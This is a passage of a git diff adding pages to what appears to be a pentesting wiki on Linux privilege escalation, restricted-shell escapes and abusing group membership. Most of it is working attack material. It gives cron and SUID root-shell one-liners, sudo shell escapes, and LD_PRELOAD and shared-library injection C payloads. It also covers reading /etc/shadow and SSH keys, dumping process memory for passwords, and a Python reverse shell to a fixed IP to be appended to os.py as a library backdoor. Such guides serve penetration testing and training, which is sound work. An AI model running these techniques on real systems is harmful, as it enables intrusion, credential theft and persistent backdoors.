+Part of the policy of `/etc/dbus-1/system.d/wpa_supplicant.conf`:
+
+```bash
+<policy user="root">
+    <allow own="fi.w1.wpa_supplicant1"/>
+    <allow send_destination="fi.w1.wpa_supplicant1"/>
+    <allow send_interface="fi.w1.wpa_supplicant1"/>
+    <allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
+</policy>
+```
+
+Therefore, if a policy is allowing your user in anyway to **interact with the bus**, you could be able to exploit it to escalate privileges \(maybe just listing for some passwords?\).
+
+Note that a **policy** that **doesn't specify** any user or group affects everyone \(`<policy>`\).  
+Policies to the context "default" affects everyone not affected by other policies \(`<policy context="default"`\).
+
+## Processes
+
+Take a look to what processes are being executed and check if any process has more privileges that it should \(maybe a tomcat being executed by root?\)
+
+```bash
+ps aux
+ps -ef
+top -n 1
+```
+
+### Process memory
+
+Some services of a server save **credentials in clear text inside the memory**. If you have access to the memory of a FTP service \(for example\) you could get the Heap and search inside of it the credentials.
+
+```bash
+gdb -p <FTP_PROCESS_PID>
+(gdb) info proc mappings
+(gdb) q
+(gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
+(gdb) q
+strings /tmp/mem_ftp #User and password
+```
+
+#### /proc/$pid/maps &  /proc/$pid/mem
+
+For a given process ID, **maps shows how memory is mapped within that processes'** virtual address space; it also shows the **permissions of each mapped region**. The **mem** psuedo file **exposes the processes memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file.
+
+To dump a process memory you could use:
+
+* [https://github.com/hajzer/bash-memory-dump](https://github.com/hajzer/bash-memory-dump) \(root is required\)
+* Script A.5 from [https://www.delaat.net/rp/2016-2017/p97/report.pdf](https://www.delaat.net/rp/2016-2017/p97/report.pdf) \(root is required\)
+
+## Scheduled jobs
+
+Check if any scheduled job has any type of vulnerability. Maybe you can take advantage of any script that root executes sometimes \(wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?\).
+
+```bash
+crontab -l
+ls -al /etc/cron* /etc/at*
+cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
+```
+
+### Example: Cron path
+
+For example, inside _/etc/crontab_ you can find the sentence: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
+
+If inside this crontab the root user tries to execute some command or script without setting the path. For example: _\* \* \* \* root overwrite.sh_
+
+Then, you can get a root shell by using:
+
+```bash
+echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
+#Wait 1 min
+/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
+```
+
+### Example: Cron using a script with a wildcard \(Wildcard Injection\)
+
+If a script being executed by root has an “**\***” inside a command, you could exploit this to make unexpected things \(like privesc\). Example:
+
+```bash
+rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
+```
+
+**The wildcard cannot be preceded of a path:** _**/some/path/\***_ **is not vulnerable \(even** _**./\***_ **is not\)**
+
+\*\*\*\*[**Read this for more Wildcards spare tricks**](wildcards-spare-tricks.md)
+
+### Example: Cron script overwriting and symlink
+
+If you can write inside a cron script executed by root, you can get a shell very easily:
+
+```bash
+echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
+#Wait until it is executed
+/tmp/bash -p
+```
+
+If the script executed by root uses somehow a directory in which you have full access, maybe it could be useful to delete that folder and create a symlink folder to another one
+
+```bash
+ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
+```
+
+### Frequent cron jobs
+
+You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges.
+
+For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and deleting the commands that have beeing executed all the time, you can do:
+
+```bash
+for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
+```
+
+You could also use [pspy](https://github.com/DominicBreuker/pspy/releases) \(this will monitor every started process\).
+
+## Commands with sudo and suid commands
+
+You could be allowed to execute some command using sudo or they could have the suid bit. Check it using:
+
+```bash
+sudo -l #Check commands you can execute with sudo
+find / -perm -4000 2>/dev/null #Find all SUID binaries
+```
+
+Some **unexpected commands allows you to read and/or write files or even execute command.** For example:
+
+```bash
+sudo awk 'BEGIN {system("/bin/sh")}'
+sudo find /etc -exec sh -i \;
+sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
+sudo tar c a.tar -I ./runme.sh a
+ftp>!/bin/sh
+less>! <shell_comand>
+```
+
+{% embed url="https://gtfobins.github.io/" %}
+
+### Sudo execution bypassing paths
+
+**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_
+
+```bash
+sudo less /var/logs/anything
+less>:e /etc/shadow #Jump to read other files using privileged less
+```
+
+```bash
+ln /etc/shadow /var/log/new
+sudo less /var/log/new #Use symlinks to read any file
+```
+
+If a **wilcard** is used \(\*\), it is even easier:
+
+```bash
+sudo less /var/log/../../etc/shadow #Read shadow
+sudo less /var/log/something /etc/shadow #Red 2 files
+```
+
+**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)
+
+### Sudo command/SUID binary without command path
+
+If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= \(root\) less_ you can exploit it by changing the PATH variable
+
+```bash
+export PATH=/tmp:$PATH
+#Put your backdoor in /tmp and name it "less"
+sudo less
+```
+
+This technique can also be used if a **suid** binary **executes another command without specifying the path to it \(always check with** _**strings**_ **the content of a weird SUID binary\)**.
+
+[Payload examples to execute.](payloads-to-execute.md)
+
+### SUID binary with command path
+
+If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling.
+
+For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it:
+
+```bash
+function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
+export -f /usr/sbin/service
+```
+
+Then, when you call the suid binary, this function will be executed
+
+### LD\_PRELOAD
+
+**LD\_PRELOAD** is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library \(libc.so\) This is called preloading a library.
+
+To avoid this mechanism being used as an attack vector for _suid/sgid_ executable binaries, the loader ignores _LD\_PRELOAD_ if _ruid != euid_. For such binaries, only libraries in standard paths that are also _suid/sgid_ will be preloaded.
+
+If you find inside the output of _**sudo -l**_ the sentence: _**env\_keep+=LD\_PRELOAD**_ and you can call some command with sudo, you can escalate privileges.
+
+Save as **/tmp/pe.c**
+
+```c
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init() {
+    unsetenv("LD_PRELOAD");
+    setgid(0);
+    setuid(0);
+    system("/bin/bash");
+}
+```
+
+Then **compile it** using:
+
+```bash
+cd /tmp
+gcc -fPIC -shared -o pe.so pe.c -nostartfiles
+```
+
+Finally, **escalate privileges** running
+
+```bash
+sudo LD_PRELOAD=pe.so <COMMAND> #Use any command you can run with sudo
+```
+
+### SUID Binary – so injection
+
+If you find some weird binary with **SUID** permissions, you could check if all the **.so** files are **loaded correctly**. In order to do so you can execute:
+
+```bash
+strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
+```
+
+For example, if you find something like: _pen\(“/home/user/.config/libcalc.so”, O\_RDONLY\) = -1 ENOENT \(No such file or directory\)_ you can exploit it.
+
+Create the file _/home/user/.config/libcalc.c_ with the code:
+
+```c
+#include <stdio.h>
+#include <stdlib.h>
+
+static void inject() __attribute__((constructor));
+
+void inject(){
+	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
+}
+```
+
+Compile it using:
+
+```bash
+gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
+```
+
+And execute the binary.
+
+### /etc/ld.so.conf.d/
+
+If you can create a file in `/etc/ld.so.conf.d/` and you can execute **`ldconfig`**with root privileges \(sudo or suid\) then you can **make executable load arbitrary libraries**. 
+
+For example, to make executables in that system load libraries from _/tmp_ you can **create** in that folder a **config file** \(_test.conf_\) pointing to _/tmp_:
+
+{% code title="/etc/ld.so.conf.d/test.conf" %}
+```bash
+/tmp
+```
+{% endcode %}
+
+And when executing **`ldconfig`**all the **binaries inside the system will be able to load libraries** from _/tmp_.  
+So if there is a **binary** that **executes** a function called **`seclogin()`** from a **library** called **`libseclogin.so`** , you can create a backdoor in _/tmp_ and impersonate that libraries with that function:
+
+{% code title="/tmp/libseclogin.so" %}
+```c
+#include <stdio.h>
+//To compile: gcc -fPIC -shared -o libseclogin.so exploit.c
+seclogin() {
+    setgid(0); setuid(0);
+    system("/bin/bash");
+}
+```
+{% endcode %}
+
+Note in the next image that \(_having already created the backdoor on /tmp_\) having the config file in _/etc/ld.so.conf.d_ pointing to _/tmp_ after using `ldconfig` the executable `myexec`stops loading the library from `/usr/lib` and loads it from _/tmp_:
+
+![](../../.gitbook/assets/image%20%28101%29.png)
+
+_This example was taken from the HTB machine: Dab._
+
+## Capabilities
+
+[Capabilities](https://www.insecure.ws/linux/getcap_setcap.html) are a little obscure but similar in principle to SUID. Linux’s thread/process privilege checking is based on capabilities: flags to the thread that indicate what kind of additional privileges they’re allowed to use. By default, root has all of them.
+
+Examples:
+
+| Capability | Description |
+| :--- | :--- |
+| CAP\_DAC\_OVERRIDE | Override read/write/execute permission checks \(full filesystem access\) |
+| CAP\_DAC\_READ\_SEARCH | Only override reading files and opening/listing directories \(full filesystem READ access\) |
+| CAP\_KILL | Can send any signal to any process \(such as sig kill\) |
+| CAP\_SYS\_CHROOT | Ability to call chroot\(\) |
+
+Capabilities are useful when you want to restrict your own processes after performing privileged operations \(e.g. after setting up chroot and binding to a socket\). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
+
+You can force capabilities upon programs using `setcap`, and query these using `getcap`:
+
+```bash
+getcap /sbin/ping
+/sbin/ping = cap_net_raw+ep
+```
+
+The `+ep` means you’re adding the capability \(“-” would remove it\) as Effective and Permitted.
+
+To identify programs in a system or folder with capabilities:
+
+```bash
+getcap -r / 2>/dev/null
+```
+
+### The special case of "empty" capabilities
+
+Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that:
+
+1. is not owned by root
+2. has no `SUID`/`SGID` bits set
+3. has empty capabilities set \(e.g.: `getcap myelf` returns `myelf =ep`\)
+
+then that binary will run as root.
+
+Capabilities info was extracted from [here](https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux)
+
+## Open shell sessions
+
+Maybe you have access to some root unprotected shell session.
+
+### screen sessions
+
+**List screen sessions**
+
+```bash
+screen -ls 
+```
+
+![](../../.gitbook/assets/image%20%28327%29.png)
+
+**Attach to a session**
+
+```bash
+screen -dr <session> #The -d is to detacche whoeevr is attached to it
+screen -dr 3350.foo #In the example of the image
+```
+
+### tmux sessions
+
+**List tmux sessions** 
+
+```bash
+tmux ls
+ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
+tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess
+```
+
+![](../../.gitbook/assets/image%20%28126%29.png)
+
+**Attach to a session**
+
+```bash
+tmux attach -t myname #If you write something in this session it will appears in the other opened one
+tmux attach -d -t myname #First detach the sessinos from the other console and then access it yourself
+tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
+```
+
+## SSH
+
+### Debian OpenSSL Predictable PRNG - CVE-2008-0166
+
+All SSL and SSH keys generated on Debian-based systems \(Ubuntu, Kubuntu, etc\) between September 2006 and May 13th, 2008 may be affected by this bug.  
+This bug caused that when creating in those OS a new ssh key **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
+
+### SSH Interesting configuration values
+
+* **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`.
+* **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`.
+* **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`.
+
+#### PermitRootLogin
+
+Specifies whether root can log in using ssh, default is `no`. Possible values:
+
+* `yes` : root can login using password and private key
+* `without-password` or `prohibit-password`: root can only login with private key
+* `forced-commands-only`: Root can login only using privatekey cand if the commands options is specified
+* `no` : no
+
+#### AuthorizedKeysFile
+
+Specifies files that contains the public keys that can be used for user authentication. I can contains tokens like `%h` , that will be replaced by the home directory. **You can indicate absolute paths** \(starting in `/`\) or **relative paths from the users home**. For example:
+
+```bash
+AuthorizedKeysFile	.ssh/authorized_keys access
+```
+
+That configuration will indicate that if you try to login with the **private** key ****of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access`
+
+#### ForwardAgent/AllowAgentForwarding
+
+SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** \(without passphrases!\) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**.
+
+You need to set this option in `$HOME/.ssh.config` like this:
+
+```text
+Host example.com
+  ForwardAgent yes
+```
+
+Notice that if `Host` is `*` every time the user jumps to a different machine that host will be able to access the keys \(which is a security issue\).
+
+The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.  
+The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` \(default is allow\).
+
+If you Forward Agent configured in an environment ****[**check here how to exploit it to escalate privileges**](ssh-forward-agent-exploitation.md).
+
+## Read sensitive data
+
+Check if you can read some sensitive files and what is contained in some folders. For example:
+
+```text
+cat /etc/shadow
+```
+
+Check the contents of **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports**
+
+```bash
+ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/
+```
+
+### \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files
+
+```bash
+fils=`find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`Hidden files
+```
+
+```bash
+find / -type f -iname ".*" -ls 2>/dev/null
+```
+
+### **Web files**
+
+```bash
+ls -alhR /var/www/ 2>/dev/null
+ls -alhR /srv/www/htdocs/ 2>/dev/null
+ls -alhR /usr/local/www/apache22/data/
+ls -alhR /opt/lampp/htdocs/ 2>/dev/null
+```
+
+### **Backups**
+
+```bash
+find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/nulll
+```
+
+### Known files containing passwords
+
+Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for several possible files that could contain passwords.
+
+Other interesting tool that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne)\*\*\*\*
+
+### R**egexp** or **strings** inside files \(It could be also useful to check [**log files**](https://www.thegeekstuff.com/2011/08/linux-var-log-files/)\)
+
+```bash
+grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq #Find string password (no cs) in those directories
+grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq #IPs inside logs
+```
+
+### E**nvironment**, there could be interesting data
+
+```text
+set
+env
+cat /proc/self/environ
+```
+
+## Writable files
+
+You should check if you can **write in some sensitive file**. For example, can you write to some **service configuration file**?
+
+```bash
+find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
+for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user
+```
+
+For example, if the machine is running a **tomcat** server and you can **modify the Tomcat service configuration file inside /etc/systemd/,** then you can modify the lines:
+
+```text
+ExecStart=/path/to/backdoor
+User=root
+Group=root
+```
+
+Your backdoor will be executed the next time that tomcat is started.
+
+### Python library hijacking
+
+If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the os library and backdoor it \(if you can write where python script is going to be executed, copy and paste the os.py library\).
+
+To **backdoor the library** just add at the end of the os.py library the following line \(change IP and PORT\):
+
+```python
+import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
+```
+
+### Logrotate exploitation
+
+There is a vulnerability on `logrotate`that allows a user with **write permissions over a log file** or **any** of its **parent directories** to make `logrotate`write **a file in any location**. If **logrotate** is being executed by **root**, then the user will be able to write any file in _**/etc/bash\_completion.d/**_  that will be executed by any user that login.  
+So, if you have **write perms** over a **log file** **or** any of its **parent folder**, you can **privesc** \(on most linux distributions, logrotate is executed automatically once a day as **user root**\). Also, check if apart of _/var/log_ there are more files being **rotated**.
+
+More detailed information about the vulnerability can be found in this page [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
+
+You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten). 
+
+## Internal Open Ports
+
+You should check if any undiscovered service is running in some port/interface. Maybe it is running with more privileges that it should or it is vulnerable to some kind of privilege escalation vulnerability.
+
+```bash
+netstat -punta
+ss -t; ss -u
+```
+
+## Sniffing
+
+Check if you can sniff traffic. If you can, you could be able to grab some credentials.
+
+```text
+timeout 1 tcpdump
+```
+
+## Storage information
+
+You can check the **storage information** using:
+
+```text
+df -h
+```
+
+There could be some **disks** that are **not mounted**
+
+```bash
+ls /dev | grep -i "sd"
+cat /etc/fstab
+lpstat -a# Check if there is any printer
+```
+
+## Check for weird executables
+
+Just check the name of the binaries inside **/bin, /usr/bin, /sbin, /usr/sbin…** \(directories inside **$PATH**\)
+
+## Other Tricks
+
+### Exploiting services
+
+[**NFS no\_root\_squash misconfiguration PE**](nfs-no_root_squash-misconfiguration-pe.md)
+
+### **Searching added software without package manager**
+
+```bash
+for i in /sbin/* /; do dpkg --search $i >/dev/null; done #Use ir inside each folder of the path
+```
+
+## More linux enumeration
+
+### Useful Software
+
+```bash
+which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 perl php ruby xterm doas sudo fetch 2>/dev/null #Check for some interesting software
+```
+
+### Network information
+
+```bash
+cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null #Known hosts and DNS
+dnsdomainname 2>/dev/null
+cat /etc/networks 2>/dev/null
+ifconfig 2>/dev/null || ip a 2>/dev/null #Info about interfaces
+iptables -L 2>/dev/null #Some iptables rules? access??
+arp -e 2>/dev/null #Known neightbours
+route 2>/dev/null #Network routes
+netstat -punta 2>/dev/null #Ports
+lsof -i #Files used by network services
+```
+
+### Users
+
+```bash
+gpg --list-keys #Do I have any PGP key?
+```
+
+### Files
+
+```bash
+ls -la $HOME #Files in $HOME
+find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER #Files in home by not in my $HOME
+find  /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; #Check for .ssh directories and their content
+```
+
+## More help
+
+[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries)
+
+## Linux/Unix Privesc Tools
+
+#### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)\*\*\*\*
+
+**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)\(-t option\)  
+**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)  
+**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)  
+**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)  
+**Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)  
+**Mestaploit:** _**multi/recon/local\_exploit\_suggester**_  
+**Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)  
+**EvilAbigail \(physical access\):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)  
+**Recopilation of more scripts**: [https://gh-dark.rauchg.now.sh/1N3/PrivEsc/tree/master/linux](https://gh-dark.rauchg.now.sh/1N3/PrivEsc/tree/master/linux)
+
+### Bibliography
+
+[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)  
+[https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)  
+[https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744)  
+[http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html](http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html)  
+[https://touhidshaikh.com/blog/?p=827](https://touhidshaikh.com/blog/?p=827)  
+[https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf](https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf)  
+[https://github.com/frizb/Linux-Privilege-Escalation](https://github.com/frizb/Linux-Privilege-Escalation)  
+[https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits)  
+[https://github.com/rtcrowley/linux-private-i](https://github.com/rtcrowley/linux-private-i)
+
+
+
diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-unix/privilege-escalation/escaping-from-limited-bash.md
new file mode 100644
index 00000000..67773118
--- /dev/null
+++ b/linux-unix/privilege-escalation/escaping-from-limited-bash.md
@@ -0,0 +1,40 @@
+# Escaping from restricted shells - Jails
+
+### **GTFOBins**
+
+**Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io/) **if you can execute any binary with "Shell" property**
+
+### Modify PATH
+
+Check if you can modify the PATH env variable
+
+```bash
+echo $PATH #See the path of the executables that you can use
+PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path
+echo /home/* #List directory
+```
+
+### Create script
+
+Check if you can create an executable file with _/bin/bash_ as content
+
+```bash
+red /bin/bash
+> w wx/path #Write /bin/bash in a writable and executable path
+```
+
+### Get bash from SSH
+
+If you are accessing via ssh you can trick this trick to execute a bash shell:
+
+```bash
+ssh -t user@<IP> bash # Get directly an interactive shell
+```
+
+### Other tricks
+
+\*\*\*\*[**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)  
+****[**https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)  
+****[**https://gtfobins.github.io**](https://gtfobins.github.io)  
+**It could also be interesting the POST on** [**Bypass Bash restrictions**](../useful-linux-commands/bypass-bash-restrictions.md)\*\*\*\*
+
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
new file mode 100644
index 00000000..1a1d823f
--- /dev/null
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
@@ -0,0 +1,170 @@
+# Interesting Groups - Linux PE
+
+## Sudo/Admin Groups
+
+### **PE - Method 1**
+
+**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines:
+
+```bash
+# Allow members of group sudo to execute any command
+%sudo	ALL=(ALL:ALL) ALL
+
+# Allow members of group admin to execute any command
+%admin 	ALL=(ALL:ALL) ALL
+```
+
+This means that **any user that belongs to the group sudo or admin can execute anything as sudo**.
+
+If this is the case, to **become root you can just execute**:
+
+```text
+sudo su
+```
+
+### PE - Method 2
+
+Find all suid binaries and check if there is the binary **Pkexec**:
+
+```bash
+find / -perm -4000 2>/dev/null
+```
+
+If you find that the binary pkexec is a SUID binary and you belong to sudo or admin, you could probably execute binaries as sudo using pkexec.  
+Check the contents of:
+
+```bash
+cat /etc/polkit-1/localauthority.conf.d/*
+```
+
+There you will find which groups are allowed to execute **pkexec** and **by default** in some linux can **appear** some of the groups **sudo or admin**.
+
+To **become root you can execute**:
+
+```bash
+pkexec "/bin/sh" #You will be prompted for your user password
+```
+
+If you try to execute **pkexec** and you get this **error**:
+
+```bash
+polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
+==== AUTHENTICATION FAILED ===
+Error executing command as another user: Not authorized
+```
+
+**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**:
+
+{% code title="session1" %}
+```bash
+echo $$ #Step1: Get current PID
+pkexec "/bin/bash" #Step 3, execute pkexec
+#Step 5, if correctly authenticate, you will have a root session
+```
+{% endcode %}
+
+{% code title="session2" %}
+```bash
+pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
+#Step 4, you will be asked in this session to authenticate to pkexec
+```
+{% endcode %}
+
+## Wheel Group
+
+**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line:
+
+```text
+%wheel	ALL=(ALL:ALL) ALL
+```
+
+This means that **any user that belongs to the group wheel can execute anything as sudo**.
+
+If this is the case, to **become root you can just execute**:
+
+```text
+sudo su
+```
+
+## Shadow Group
+
+Users from the **group shadow** can **read** the **/etc/shadow** file:
+
+```text
+-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
+```
+
+So, read the file and try to **crack some hashes**.
+
+## Disk Group
+
+ This privilege is almost **equivalent to root access** as you can access all the data inside of the machine.
+
+Files:`/dev/sd[a-z][1-9]`
+
+```text
+debugfs /dev/sda1
+debugfs: cd /root
+debugfs: ls
+debugfs: cat /root/.ssh/id_rsa
+debugfs: cat /etc/shadow
+```
+
+Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do:
+
+```bash
+debugfs -w /dev/sda1
+debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt
+```
+
+However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error.
+
+## Video Group
+
+Using the command `w` you can find **who is logged on the system** and it will show an output like the following one:
+
+```bash
+USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
+yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
+moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash
+```
+
+The **tty1** means that the user **yossi is logged physically** to a terminal on the machine.
+
+The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size`
+
+```bash
+cat /dev/fb0 > /tmp/screen.raw
+cat /sys/class/graphics/fb0/virtual_size
+```
+
+To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**:
+
+![](../../.gitbook/assets/image%20%28208%29.png)
+
+Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\):
+
+![](../../.gitbook/assets/image%20%28295%29.png)
+
+## Root Group
+
+It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges...
+
+**Check which files root members can modify**:
+
+```bash
+find / -group root -perm -g=w 2>/dev/null
+```
+
+## Docker Group
+
+You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
+
+{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
+
+{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
+
+## lxc/lxd Group
+
+[lxc - Privilege Escalation](lxd-privilege-escalation.md)
+
diff --git a/linux-unix/privilege-escalation/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/lxd-privilege-escalation.md
new file mode 100644
index 00000000..c4cc7722
--- /dev/null
